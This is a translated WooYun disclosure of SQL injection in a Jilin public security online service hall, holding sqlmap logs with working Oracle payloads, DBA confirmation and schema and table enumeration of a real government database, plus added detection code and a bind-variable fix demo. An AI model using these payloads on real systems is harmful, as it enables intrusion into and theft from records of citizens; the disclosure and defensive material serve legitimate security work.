
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0145686

Title: Multiple parameters on another port of a sensitive department's online service hall are vulnerable to SQL injection (DBA privileges, 27 databases, large amounts of data exposed), part 2

Affected vendor: 公安部一所 (First Research Institute of the Ministry of Public Security)

Author: 路人甲

Submitted: 2015-10-10 10:12

Fixed: 2015-11-24 11:10

Published: 2015-11-24 11:10

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: handed to a third-party partner organisation (公安部一所) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-10-10: details sent to the vendor, awaiting vendor handling
2015-10-10: vendor confirmed; details visible to the vendor only
2015-10-20: details opened to core white hats and domain experts
2015-10-30: details opened to regular white hats
2015-11-09: details opened to intern white hats
2015-11-24: details opened to the public

Brief description:

Another port; multiple parameters in multiple places are injectable, with DBA privileges and 27 databases. Please mask the IP address, and if there is any other sensitive information, admins, please mask that too!

Detailed description:

Finally reachable again. A few days ago the port ran into problems after testing? It could not be reached for a while. This time I'll test with fewer threads and a lower level!~~~
Jilin Province public security online bureau (吉林省公安机关 网上公安局)

**.**.**.**:8000/


Enter the online service platform, then "business handling"; under the business categories pick any one, open an item and start capturing traffic, stop the capture after the "buy licence" step, and test the captured requests.
Injection point 1:

**.**.**.**:8000/firstList.jsp?sid=4028811932a87caf0132a89ac07f0010


sid is injectable, with DBA privileges.
Every place like the following has the sid injection; it is the same parameter throughout.

[screenshot 0.jpg]


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: sid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: sid=4028811932a87caf0132a89ac07f0010' AND 7008=7008 AND 'sZux'='sZux
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: sid=4028811932a87caf0132a89ac07f0010' UNION ALL SELECT CHR(113)||CHR(98)||CHR(102)||CHR(116)||CHR(113)||CHR(120)||CHR(120)||CHR(98)||CHR(75)||CHR(109)||CHR(90)||CHR(86)||CHR(83)||CHR(107)||CHR(117)||CHR(113)||CHR(97)||CHR(106)||CHR(106)||CHR(113),NULL FROM DUAL--
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: sid=4028811932a87caf0132a89ac07f0010' AND 4368=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(74)||CHR(70)||CHR(65),5) AND 'NZDu'='NZDu
---
[01:05:33] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[01:05:33] [INFO] fetching current user
current user: 'NOTA'
[01:05:34] [INFO] fetching current database
[01:05:34] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle): 'NOTA'
[01:05:34] [INFO] testing if current user is DBA
current user is DBA: True


[screenshot 1.jpg]


[01:10:40] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[01:10:40] [INFO] fetching database users
database management system users [37]:
[*] ANONYMOUS
[*] BI
[*] CGS
[*] CTXSYS
[*] DBORACLE
[*] DBSNMP
[*] DIP
[*] DMSYS
[*] EXFSYS
[*] HR
[*] IX
[*] MDDATA
[*] MDSYS
[*] MGMT_VIEW
[*] NOTA
[*] NOTA_TEMP
[*] NOTADT
[*] OE
[*] OLAPSYS
[*] ORDPLUGINS
[*] ORDSYS
[*] OTATARGET
[*] OUTLN
[*] PM
[*] QS_ERP
[*] SCOTT
[*] SH
[*] SI_INFORMTN_SCHEMA
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WEBOTA
[*] WEBOTABASE
[*] WMSYS
[*] WSPCS
[*] XDB


[01:11:19] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[01:11:19] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[01:11:19] [INFO] fetching database (schema) names
available databases [27]:
[*] CGS
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] HR
[*] IX
[*] MDSYS
[*] NOTA
[*] NOTA_TEMP
[*] NOTADT
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] SCOTT
[*] SH
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WEBOTA
[*] WEBOTABASE
[*] WMSYS
[*] WSPCS
[*] XDB


Database: HR
+-------------+---------+
| Table | Entries |
+-------------+---------+
| EMPLOYEES | 107 |
| DEPARTMENTS | 27 |
| COUNTRIES | 25 |
| LOCATIONS | 23 |
| JOBS | 19 |
| JOB_HISTORY | 10 |
| REGIONS | 4 |
+-------------+---------+


Database: NOTA
+-------------------------+---------+
| Table | Entries |
+-------------------------+---------+
| SERVICE_MESSAGE | 14284896 |
| TRIGGER_MESSAGE | 1378479 |
| CRJ_YW_BZJDJGB | 978587 |
| PROJECTSMS | 142078 |
| CRJ_YW_WSSQ_HGTSQXXB | 57847 |
| CRJ_YW_WSSQ_TWZJBLB | 57677 |
| CRJ_YW_WSSQ_GXRB | 34602 |
| CRJ_YW_WSSQ_JTCYB | 33178 |
| CRJ_YW_WSSQ_QZBLB | 29193 |
| APPLY_DOC | 21602 |
| JITTASK | 18699 |
| CRJ_YW_WSSQ_YYXXB | 17721 |
| JITTASKINSTANCE | 15166 |
| JITTRANSITION | 14922 |
| FLOWSARCHIVE | 14137 |
| "CONDITION" | 14129 |
| WEBFUJIAN | 13130 |
| JITFUJIAN | 11713 |
| APPLY_LAWS | 8117 |
| WEBPROCESSINSTANCE | 4486 |
| JITPROCESSDATA | 4251 |
| JITPROCESSDEFINITION | 4238 |
| PROTYPE_RELATION | 3915 |
| SHOULI | 3813 |
| WORKDATE | 3652 |
| JITPROCESSINSTANCE | 3411 |
| PROJECTINFO | 3271 |
| PROJECTARCHIVES | 3238 |
| QUJIANTAB | 3217 |
| DOCUMENTS | 3104 |
| CRJ_YW_SWDWB | 2911 |
| CRJ_YW_WSSQ_YQRB | 1614 |
| LAWS | 1210 |
| PROJECTSORT | 1060 |
| PROJECTANNEX | 826 |
| CRJ_YW_WSSQ_CXSQXXB | 590 |
| CRJ_YW_WSSQ_BGJZB | 332 |
| CRJ_YW_BZJDCXB | 276 |
| PROJECTINFOMB | 182 |
| DICTIONARY | 165 |
| JITVARIABLEDEFINITION | 108 |
| ADDRESSZD | 92 |
| CRJ_YW_WSSQ_CXSQJGB | 84 |
| HANDUPINFO | 74 |
| PROJECTTBL | 57 |
| PLAN_TABLE | 56 |
| CRJ_YW_WSSQ_WGR_ZJSQB | 53 |
| CRJ_YW_WSSQ_WGR_QZBL_GR | 33 |
| JITFUJIAN2 | 26 |
| CRJ_YW_WSSQ_WGR_XXRB | 13 |
| JITFORMINFO | 12 |
| QJTYPE | 11 |
| DEALWRONG | 10 |
| PROJECTSMSDEFINITION | 7 |
| SCORETYPE | 5 |
| WEBFORM | 4 |
| CHANNEL | 3 |
| DUBANPRO | 3 |
| QJCLASS | 3 |
| TOUSUTYPE | 2 |
| WEBARCHIVES | 2 |
| WORKTIME_STANDARD | 1 |
+-------------------------+---------+


+------------+---------+
| Table | Entries |
+------------+---------+
| LOG | 32673 |
| SYSOP_LOG | 4165 |
| STRUCTURE | 2847 |
| STAFF | 1497 |
| DEPARTMENT | 1232 |
| ROLERELATE | 252 |
| FLOOR_REL | 28 |
| SYSTEMINFO | 3 |
| MANAGER | 1 |
+------------+---------+


[screenshot 2.jpg]

[screenshot 3.jpg]

[screenshot 4.jpg]


There is a huge amount of data, so I'll stop here!
Injection point 2:

**.**.**.**:8000/getdata.jsp (POST)
id=2c9086e432753cd1013275513a6a0003&dictid=null


The dictid parameter is vulnerable to time-based (delay) injection

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: dictid
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: id=2c9086e432753cd1013275513a6a0003&dictid=null' AND 2862=DBMS_PIPE.RECEIVE_MESSAGE(CHR(67)||CHR(119)||CHR(87)||CHR(84),5) AND 'cMIy'='cMIy
---
[01:26:48] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[01:26:48] [INFO] fetching current user
[01:26:48] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[01:26:48] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[01:27:03] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads
[01:27:13] [INFO] adjusting time delay to 1 second due to good response times
NOTA
current user: 'NOTA'
[01:27:27] [INFO] fetching current database
[01:27:27] [INFO] resumed: NOTA
[01:27:27] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle): 'NOTA'
[01:27:27] [INFO] testing if current user is DBA
current user is DBA: True


[screenshot 5.jpg]


Injection point 3:
Enter the online service platform, then "result query"

**.**.**.**:8000/self/showWssb100.jsp?searchNum=6406&piid=11111111111111111111&col3=222222&hiddenFlag=1


piid is injectable

sqlmap identified the following injection points with a total of 374 HTTP(s) requests:
---
Place: GET
Parameter: piid
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: searchNum=6406&piid=11111111111111111111' AND 3868=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65)||CHR(103)||CHR(84)||CHR(97),5) AND 'GTjm'='GTjm&col3=222222&hiddenFlag=1
---
[02:18:20] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[02:18:20] [INFO] fetching current user
[02:18:20] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[02:18:20] [INFO] retrieved:
[02:18:20] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[02:18:44] [INFO] adjusting time delay to 1 second due to good response times
NOTA
current user: 'NOTA'
[02:19:04] [INFO] fetching current database
[02:19:04] [INFO] resumed: NOTA
[02:19:04] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle): 'NOTA'
[02:19:04] [INFO] testing if current user is DBA
current user is DBA: True


[screenshot 6.jpg]


Injection point 4:
Enter the online service platform, then "result query", the lower one

**.**.**.**:8000/self/showWssbList100.jsp (POST)
col5=13888888888&col6=11111111111&col3=22222222&searchNum=6405&hiddenFlag=2&submitSav.x=27&submitSav.y=5


The col5, col6 and col3 parameters are all injectable

sqlmap identified the following injection points with a total of 559 HTTP(s) requests:
---
Place: POST
Parameter: col3
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: col5=13888888888&col6=11111111111&col3=22222222' AND 7676=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(117)||CHR(111)||CHR(113)||(SELECT (CASE WHEN (7676=7676) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(101)||CHR(99)||CHR(113)||CHR(62))) FROM DUAL) AND 'GazS'='GazS&searchNum=6405&hiddenFlag=2&submitSav.x=27&submitSav.y=5
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: col5=13888888888&col6=11111111111&col3=22222222' AND 4780=DBMS_PIPE.RECEIVE_MESSAGE(CHR(89)||CHR(77)||CHR(83)||CHR(73),5) AND 'sJRg'='sJRg&searchNum=6405&hiddenFlag=2&submitSav.x=27&submitSav.y=5
Place: POST
Parameter: col5
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: col5=13888888888') AND 4947=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(117)||CHR(111)||CHR(113)||(SELECT (CASE WHEN (4947=4947) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(101)||CHR(99)||CHR(113)||CHR(62))) FROM DUAL) AND ('YrhE'='YrhE&col6=11111111111&col3=22222222&searchNum=6405&hiddenFlag=2&submitSav.x=27&submitSav.y=5
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: col5=13888888888') AND 9355=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(70)||CHR(118)||CHR(115),5) AND ('ATnp'='ATnp&col6=11111111111&col3=22222222&searchNum=6405&hiddenFlag=2&submitSav.x=27&submitSav.y=5
Place: POST
Parameter: col6
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: col5=13888888888&col6=11111111111') AND 3930=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(117)||CHR(111)||CHR(113)||(SELECT (CASE WHEN (3930=3930) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(101)||CHR(99)||CHR(113)||CHR(62))) FROM DUAL) AND ('YJCa'='YJCa&col3=22222222&searchNum=6405&hiddenFlag=2&submitSav.x=27&submitSav.y=5
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: col5=13888888888&col6=11111111111') AND 9312=DBMS_PIPE.RECEIVE_MESSAGE(CHR(71)||CHR(106)||CHR(90)||CHR(82),5) AND ('KsUP'='KsUP&col3=22222222&searchNum=6405&hiddenFlag=2&submitSav.x=27&submitSav.y=5
---
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: col5, type: Single quoted string (default)
[1] place: POST, parameter: col6, type: Single quoted string
[2] place: POST, parameter: col3, type: Single quoted string
[q] Quit
> 0
[02:29:09] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[02:29:09] [INFO] fetching current user
[02:29:10] [INFO] retrieved: NOTA
current user: 'NOTA'
[02:29:10] [INFO] fetching current database
[02:29:10] [INFO] resumed: NOTA
[02:29:10] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle): 'NOTA'
[02:29:10] [INFO] testing if current user is DBA
current user is DBA: True


[screenshot 7.jpg]

[screenshot 8.jpg]


Next time I'll test the parameters in other places!~~~ There should be more injectable parameters elsewhere.
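The four sqlmap findings above show all of the payload shapes a defender of this application would need to recognise: a boolean tautology appended to sid, a UNION with the result encoded as a CHR()||CHR() chain, DBMS_PIPE.RECEIVE_MESSAGE for the time-based probes, and XMLType for the error-based ones. The following is an added example written for this page, not code from the report or from sqlmap: it URL-decodes a parameter string, expands the CHR() chains so sqlmap's boundary markers become readable, and classifies the request by the same technique names sqlmap printed. The sample inputs are constructed from the payloads printed above (the last one trimmed of the submitSav.x/y form fields); nothing here is a real capture.

```python
import re
from urllib.parse import unquote_plus

# Constructed inputs (not a capture from the original report): the parameter
# strings of the four injection points above, written the way a proxy log or
# WAF would record them. The first payload is left URL-encoded on purpose.
SAMPLES = {
    "benign":
        "sid=4028811932a87caf0132a89ac07f0010",
    "sid boolean (encoded)":
        "sid=4028811932a87caf0132a89ac07f0010%27+AND+7008%3D7008+AND+%27sZux%27%3D%27sZux",
    "sid union":
        "sid=4028811932a87caf0132a89ac07f0010' UNION ALL SELECT CHR(113)||CHR(98)||CHR(102)"
        "||CHR(116)||CHR(113)||CHR(120)||CHR(120)||CHR(98)||CHR(75)||CHR(109)||CHR(90)||CHR(86)"
        "||CHR(83)||CHR(107)||CHR(117)||CHR(113)||CHR(97)||CHR(106)||CHR(106)||CHR(113),NULL FROM DUAL--",
    "dictid time-based":
        "id=2c9086e432753cd1013275513a6a0003&dictid=null' AND 2862=DBMS_PIPE.RECEIVE_MESSAGE"
        "(CHR(67)||CHR(119)||CHR(87)||CHR(84),5) AND 'cMIy'='cMIy",
    "col3 error-based":
        "col5=13888888888&col6=11111111111&col3=22222222' AND 7676=(SELECT UPPER(XMLType(CHR(60)"
        "||CHR(58)||CHR(113)||CHR(120)||CHR(117)||CHR(111)||CHR(113)||(SELECT (CASE WHEN (7676=7676)"
        " THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(101)||CHR(99)||CHR(113)||CHR(62)))"
        " FROM DUAL) AND 'GazS'='GazS&searchNum=6405&hiddenFlag=2",
}

# A run of CHR(n)||CHR(m)||... : sqlmap builds its string literals this way so
# that no quote character has to appear inside them.
CHR_CHAIN = re.compile(r"CHR\(\d+\)(?:\s*\|\|\s*CHR\(\d+\))*", re.IGNORECASE)


def decode_chr_chains(sql):
    """Replace each CHR() chain with the quoted literal it spells out.
    Returns (rewritten sql, list of decoded literals in order of appearance)."""
    literals = []

    def repl(m):
        codes = re.findall(r"CHR\((\d+)\)", m.group(0), re.IGNORECASE)
        text = "".join(chr(int(c)) for c in codes)
        literals.append(text)
        return "'" + text + "'"

    return CHR_CHAIN.sub(repl, sql), literals


# (technique label, pattern over the decoded parameter string); the labels
# follow the "Type:" lines in the sqlmap output above.
RULES = [
    ("boolean-based blind",
     re.compile(r"'\s*AND\s+(\d+)=\1\s+AND\s+'(\w+)'='\2", re.IGNORECASE)),
    ("UNION query",
     re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.IGNORECASE)),
    ("time-based blind",
     re.compile(r"\bDBMS_PIPE\.RECEIVE_MESSAGE\s*\(", re.IGNORECASE)),
    ("error-based (XMLType)",
     re.compile(r"\bXMLType\s*\(", re.IGNORECASE)),
]


def classify(raw_params):
    """URL-decode, expand CHR() chains, then apply every rule."""
    decoded, literals = decode_chr_chains(unquote_plus(raw_params))
    techniques = [label for label, rx in RULES if rx.search(decoded)]
    return {"techniques": techniques, "decoded": decoded, "chr_literals": literals}


def scan(samples):
    """Map sample name -> matched techniques, for the samples that matched."""
    hits = {}
    for name, raw in samples.items():
        result = classify(raw)
        if result["techniques"]:
            hits[name] = result["techniques"]
    return hits


if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        r = classify(raw)
        print(f"{name:24} {', '.join(r['techniques']) or '-':24} "
              f"literals={r['chr_literals']}")
```

The decoded literals are the useful part for triage: the UNION payload expands to qbftq...qajjq, which is the prefix/suffix pair sqlmap greps the response for, and the XMLType payload expands to "<:qxuoq" and "qpecq>", the invalid XML name that makes Oracle echo the extracted value inside its error text. Seeing those markers in a log, even with the DBMS_PIPE or UNION keyword obfuscated, is enough to attribute the traffic to sqlmap. The same decoding applies to the POST bodies (dictid, col3/col5/col6), which a plain access log does not record, so the input here has to come from a proxy, WAF or application-level log.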

Proof of vulnerability:

[screenshot 2.jpg]

[screenshot 3.jpg]

[screenshot 4.jpg]

Fix recommendations:

Filtering
Privilege restriction
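The two recommendations above are the right ones, and the order of priority is bind variables first, filtering second, because every injection point in this report has the same root cause: a request parameter concatenated into the SQL text. The following is an added example, not the application's code (the JSP source is not on this page): it reproduces the firstList.jsp?sid= pattern against an in-memory SQLite table standing in for the Oracle back end, runs sqlmap's boolean probe from the report against it to show the true/false oracle, and then shows the same lookup with a bind variable plus an allow-list on the sid format (the sids in the report are 32 lowercase hex characters). Table name, columns and rows are invented for the demo.

```python
import re
import sqlite3

# Constructed demo data (not from the report): three rows keyed by sids in the
# 32-hex-character shape the application uses. SQLite stands in for Oracle;
# the table name and columns are invented.
VALID_SID = "4028811932a87caf0132a89ac07f0010"
ROWS = [
    (VALID_SID,                          "exit-entry permit application", "applicant A"),
    ("4028811932a87caf0132a89ac07f0011", "household registration query",  "applicant B"),
    ("4028811932a87caf0132a89ac07f0012", "vehicle licence renewal",       "applicant C"),
]


def setup():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE projectinfo (sid TEXT PRIMARY KEY, title TEXT, applicant TEXT)")
    con.executemany("INSERT INTO projectinfo VALUES (?, ?, ?)", ROWS)
    return con


def first_list_vulnerable(con, sid):
    """The pattern behind firstList.jsp?sid=...: the parameter is spliced into
    the SQL text, so a quote in it rewrites the WHERE clause."""
    sql = "SELECT sid, title FROM projectinfo WHERE sid = '" + sid + "'"
    return con.execute(sql).fetchall()


def first_list_bound(con, sid):
    """Bind variable only: the value can never change the statement's
    structure, whatever quotes or keywords it contains."""
    return con.execute("SELECT sid, title FROM projectinfo WHERE sid = ?", (sid,)).fetchall()


SID_RE = re.compile(r"[0-9a-f]{32}")


def first_list_fixed(con, sid):
    """Allow-list the format first (defence in depth), then bind."""
    if not SID_RE.fullmatch(sid):
        raise ValueError("sid must be 32 lowercase hex characters")
    return first_list_bound(con, sid)


if __name__ == "__main__":
    con = setup()
    true_probe = VALID_SID + "' AND 7008=7008 AND 'sZux'='sZux"   # sqlmap's boolean probe
    false_probe = VALID_SID + "' AND 7008=7009 AND 'sZux'='sZux"
    print("vulnerable, TRUE probe :", len(first_list_vulnerable(con, true_probe)), "row(s)")
    print("vulnerable, FALSE probe:", len(first_list_vulnerable(con, false_probe)), "row(s)")
    print("vulnerable, tautology  :", len(first_list_vulnerable(con, "x' OR '1'='1")), "row(s)")
    print("bound, tautology       :", len(first_list_bound(con, "x' OR '1'='1")), "row(s)")
    try:
        first_list_fixed(con, true_probe)
    except ValueError as e:
        print("fixed, probe rejected  :", e)
    print("fixed, real sid        :", first_list_fixed(con, VALID_SID))
```

The true probe returns the row and the false probe returns nothing, which is exactly the one-bit oracle sqlmap used to enumerate the NOTA schema. In the JSP the equivalent of first_list_bound is a PreparedStatement with setString; filtering alone is not a substitute, since the piid, dictid and col5/col6/col3 parameters would each need their own allow-list and any one that is missed stays exploitable. On the "privilege restriction" point: the web account should not hold the DBA role at all. An Oracle account with CREATE SESSION and object grants on only the NOTA tables the application reads and writes would still be injectable, but could not list the other 26 schemas, read SYS views or reach the HR sample schema the report enumerated.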

Copyright notice: please credit the source when reposting: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 7

Confirmed: 2015-10-10 11:08

Vendor reply:

Thanks for the submission!!
The described issue has been verified and confirmed; the responsible party has been notified to fix it.

Latest status:

None yet